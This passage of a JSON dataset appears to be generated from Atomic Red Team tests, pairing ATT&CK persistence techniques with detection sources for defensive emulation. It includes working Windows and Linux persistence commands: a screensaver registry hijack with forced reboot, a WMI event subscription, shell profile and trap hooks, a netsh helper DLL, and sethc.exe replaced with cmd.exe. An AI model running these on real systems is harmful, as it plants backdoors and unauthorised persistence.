Requires a reboot and logon.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_binary": { + "description": "Executable binary to use in place of screensaver for persistence", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "copy #{input_binary} \"%SystemRoot%\\System32\\evilscreensaver.scr\"\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaveActive /t REG_SZ /d 1 /f\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaveTimeout /t REG_SZ /d 60 /f\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v SCRNSAVE.EXE /t REG_SZ /d \"%SystemRoot%\\System32\\evilscreensaver.scr\" /f\nshutdown /r /t 0\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + 
"collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": 
"user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1546.003", + "command_list": [ + "$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';\n EventNameSpace='root\\CimV2';\n QueryLanguage=\"WQL\";\n Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND 
TargetInstance.SystemUpTime < 325\"};\n$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs\n\n$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';\n CommandLineTemplate=\"$($Env:SystemRoot)\\System32\\notepad.exe\";}\n$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs\n\n$FilterToConsumerArgs = @{\nFilter = [Ref] $Filter;\nConsumer = [Ref] $Consumer;\n}\n$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs\n" + ], + "commands": [ + { + "command": "$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';\n EventNameSpace='root\\CimV2';\n QueryLanguage=\"WQL\";\n Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"};\n$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs\n\n$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';\n CommandLineTemplate=\"$($Env:SystemRoot)\\System32\\notepad.exe\";}\n$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs\n\n$FilterToConsumerArgs = @{\nFilter = [Ref] $Filter;\nConsumer = [Ref] $Consumer;\n}\n$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs\n", + "source": "atomics/T1546.003/T1546.003.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Windows Management Instrumentation Event Subscription" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.003", + "display_name": "Event Triggered Execution: Windows Management Instrumentation Event Subscription", + "atomic_tests": [ + { + "name": "Persistence via WMI Event Subscription", + 
"auto_generated_guid": "3c64f177-28e2-49eb-a799-d767b24dd1e0", + "description": "Run from an administrator powershell window. After running, reboot the victim machine.\nAfter it has been online for 4 minutes you should see notepad.exe running as SYSTEM.\n\nCode references\n\nhttps://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af\n\nhttps://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';\n EventNameSpace='root\\CimV2';\n QueryLanguage=\"WQL\";\n Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"};\n$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs\n\n$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';\n CommandLineTemplate=\"$($Env:SystemRoot)\\System32\\notepad.exe\";}\n$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs\n\n$FilterToConsumerArgs = @{\nFilter = [Ref] $Filter;\nConsumer = [Ref] $Consumer;\n}\n$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs\n", + "cleanup_command": "$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter \"Name = 'AtomicRedTeam-WMIPersistence-Example'\"\n$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter \"Name = 'AtomicRedTeam-WMIPersistence-Example'\"\n$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query \"REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding\" -ErrorAction 
SilentlyContinue\n$FilterConsumerBindingToCleanup | Remove-WmiObject\n$EventConsumerToCleanup | Remove-WmiObject\n$EventFilterToCleanup | Remove-WmiObject\n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + 
"collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "wmi", + "definition": "Information about objects from system classes (such as providers, filters, and consumers) that support Windows Management Instrumentation (WMI) activitites.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "wmi creation", + "description": "A WMI object (filter, consumer, subscription, binding, provider) was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "wmi object" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-system-classes", + "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-architecture" + ] + ] + }, + { + "technique_id": "T1546.004", + "command_list": [ + "echo 'echo \"Hello from Atomic Red Team T1546.004\"' >> ~/.bash_profile\n", + "echo 'echo \"Hello from Atomic Red Team T1546.004\"' >> ~/.bashrc\n" + ], + "commands": [ + { + "command": "echo 'echo \"Hello from Atomic Red Team T1546.004\"' >> 
~/.bash_profile\n", + "source": "atomics/T1546.004/T1546.004.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: .bash_profile and .bashrc" + }, + { + "command": "echo 'echo \"Hello from Atomic Red Team T1546.004\"' >> ~/.bashrc\n", + "source": "atomics/T1546.004/T1546.004.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: .bash_profile and .bashrc" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.004", + "display_name": "Event Triggered Execution: .bash_profile and .bashrc", + "atomic_tests": [ + { + "name": "Add command to .bash_profile", + "auto_generated_guid": "94500ae1-7e31-47e3-886b-c328da46872f", + "description": "Adds a command to the .bash_profile file of the current user\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "command_to_add": { + "description": "Command to add to the .bash_profile file", + "type": "String", + "default": "echo \"Hello from Atomic Red Team T1546.004\"" + } + }, + "executor": { + "command": "echo '#{command_to_add}' >> ~/.bash_profile\n", + "cleanup_command": "sed -i '/#{command_to_add}/d' ~/.bash_profile\n", + "name": "sh" + } + }, + { + "name": "Add command to .bashrc", + "auto_generated_guid": "0a898315-4cfa-4007-bafe-33a4646d115f", + "description": "Adds a command to the .bashrc file of the current user\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "command_to_add": { + "description": "Command to add to the .bashrc file", + "type": "String", + "default": "echo \"Hello from Atomic Red Team T1546.004\"" + } + }, + "executor": { + "command": "echo '#{command_to_add}' >> ~/.bashrc\n", + "cleanup_command": "sed -i '/#{command_to_add}/d' ~/.bashrc\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + 
"data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + 
], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1546.005", + "command_list": [ + "trap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash\" EXIT\nexit\ntrap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash\" SIGINt\n" + ], + "commands": [ + { + "command": "trap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash\" EXIT\nexit\ntrap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash\" SIGINt\n", + "source": "atomics/T1546.005/T1546.005.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Trap" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.005", + "display_name": "Event Triggered Execution: Trap", + "atomic_tests": [ + { + "name": "Trap", + "auto_generated_guid": "a74b2e07-5952-4c03-8b56-56274b076b61", + "description": "After exiting the shell, the script will download and execute.\nAfter sending a keyboard interrupt (CTRL+C) the script will download and execute.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { 
+ "command": "trap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash\" EXIT\nexit\ntrap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash\" SIGINt\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed 
through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1546.007", + "command_list": [ + "netsh.exe add helper C:\\Path\\file.dll\n" + ], + "commands": [ + { + "command": "netsh.exe add helper C:\\Path\\file.dll\n", + "source": "atomics/T1546.007/T1546.007.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Netsh Helper DLL" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.007", + "display_name": "Event Triggered 
Execution: Netsh Helper DLL", + "atomic_tests": [ + { + "name": "Netsh Helper DLL Registration", + "auto_generated_guid": "3244697d-5a3a-4dfc-941c-550f69f91a4d", + "description": "Netsh interacts with other operating system components using dynamic-link library (DLL) files\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "helper_file": { + "description": "Path to DLL", + "type": "Path", + "default": "C:\\Path\\file.dll" + } + }, + "executor": { + "command": "netsh.exe add helper #{helper_file}\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": 
"Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", 
+ "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + 
"https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1546.008", + "command_list": [ + "$input_table = \"osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe\".split(\",\")\n$Name = \"Debugger\"\n$Value = \"#{attached_process}\"\nForeach ($item in $input_table){\n $item = $item.trim()\n $registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\$item\"\n IF(!(Test-Path $registryPath))\n {\n New-Item -Path $registryPath -Force\n New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force\n }\n ELSE\n {\n New-ItemProperty -Path $registryPath -Name $name -Value $Value\n }\n}\n", + "$input_table = \"#{parent_list}\".split(\",\")\n$Name = \"Debugger\"\n$Value = \"C:\\windows\\system32\\cmd.exe\"\nForeach ($item in $input_table){\n $item = $item.trim()\n $registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\$item\"\n IF(!(Test-Path $registryPath))\n {\n New-Item -Path $registryPath -Force\n New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force\n }\n ELSE\n {\n New-ItemProperty -Path $registryPath -Name $name -Value $Value\n }\n}\n", + "copy C:\\Windows\\System32\\sethc.exe C:\\Windows\\System32\\sethc_backup.exe\ntakeown /F C:\\Windows\\System32\\sethc.exe /A\nicacls C:\\Windows\\System32\\sethc.exe /grant Administrators:F /t\ncopy /Y C:\\Windows\\System32\\cmd.exe C:\\Windows\\System32\\sethc.exe\n" + ], + "commands": [ + { + "command": "$input_table = \"osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe\".split(\",\")\n$Name = \"Debugger\"\n$Value = \"#{attached_process}\"\nForeach ($item in $input_table){\n $item = $item.trim()\n 
